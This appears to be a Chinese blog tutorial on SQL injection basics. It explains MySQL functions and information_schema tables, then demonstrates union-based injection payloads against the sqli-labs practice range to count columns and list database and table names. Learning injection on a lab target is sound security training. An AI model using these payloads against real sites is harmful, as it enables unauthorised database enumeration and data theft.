SQL注入基础知识(渗透测试第二天)

目录

SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。那什么是SQL了?结构化查询语言(Structured Query Language,缩写:SQL),是一种关系型数据库查询的标准编程语言,用于存取数据以及查询、更新、删除和管理关系型数据库(即SQL是一种数据库查询语言)

二、SQL注入常用

1.SQl注入中Mysql的常用函数

# 一些SQL注入常用的函数
version()                 # 查看数据库版本
database()                # 查看当前数据库名
user()                    # 查看当前数据库用户
system_user()             # 查看系统用户名
group_concat()            # 把数据库中的某列数据或某几列数据合并为一个字符串
@@datadir                 # 查看数据库路径
@@version_compile_os      # 查看操作系统

2.关于数据库

在Mysql数据库中,有一个在数据库中默认存放为information_schema的数据库,该数据库中包含了当前数据库中的所有数据库、表等相关信息,我们需要记住三个常用的表名,分别是schemata,tables,columns

schemata         # 存储的是该用户创建的所有数据库的库名,要记住该表中记录数据库名的字段名为 schema_name。
tables           # 存储该用户创建的所有数据库的库名和表名,要记住该表中记录数据库 库名和表名的字段分别是 table_schema 和 table_name.
columns          # 存储该用户创建的所有数据库的库名、表名、字段名,要记住该表中记录数据库库名、表名、字段名为 table_schema、table_name、column_name。

三、常用的SQL注入手法

注意

我这里用sqli-labs-master靶场做演示,如图:

联合查询(union)

1、判断当前表字段个数

当输入3时,页面可以正常显示

?id=1' order by 3 --+

将3改为4后,页面就会报错,说明该表只有3个字段

2、爆当前数据库名字

?id=-1' union select 1,2,database() --+

3、获取当前的数据库和表

#直接套用语句
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

这里group_concat()的作用是将同一个分组下的行拼接在一起,这样就可以看到所有的表的名字

可以通过database()函数获取数据库名称

也可以通过查看关于数据库中的对应的表和数据库


总结

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值